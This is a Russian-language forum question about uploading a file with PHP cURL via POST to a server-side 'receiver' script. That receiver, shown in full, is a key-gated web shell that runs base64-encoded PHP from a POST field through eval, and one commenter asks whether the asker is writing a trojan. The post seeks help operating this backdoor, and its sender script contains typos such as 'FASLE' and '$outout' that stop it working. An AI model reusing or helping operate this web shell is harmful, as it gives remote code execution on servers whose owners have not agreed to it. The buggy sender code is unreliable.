# Отправка файла средствами CURL + POST

Tags: php, post, curl

Есть на сервере файл получатель get_post.php:

```
<?php 
error_reporting(0);
set_time_limit(0);
if ($_GET['q']=='1'){echo '200'; exit;}

if($_GET['key']=='sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG')eval(base64_decode($_POST['fack']));
if(md5($_GET['key'])=='7663f1b3555993ad229183b0efad3261')eval(base64_decode($_POST['fack'])); 
?>
```

Мне надо с помощью curl отправить файл 1.php со своего сервера на сервер с файлом получателем, POST запросом + на сервере получателе установлена авторизация .htacces.
Уже 3 дня сижу с этой штукой не могу побороть . Заранее спасибо.

код которым пытаюсь отправить файл:

```
<?php
$url = $_SERVER["SERVER_NAME"];
$data = array("fack" => "@/var/www/ku/data/www/мой_ip_сервера/app/webroot/1/123.php");
$string = http_build_query($data);
$url = "http://ip_получатель/get_post.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); 
curl_setopt($ch, CURLOPT_USERPWD, 'admin:pass');
curl_setopt($ch, CURLOPT_POSTFIELDS, $string);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$outout = curl_exec($ch);
 if ($output === FASLE) {
   echo "$url" . curl_error($ch);
} else {
   echo $output;
}
curl_close($ch);
?>
```

Comment: а код, которым пытаетесь отправлять, можно увидеть?

Comment: Ох, какой у вас красивый get_post.php! Троян пишите?

Comment: добавил файл которым пробую оправить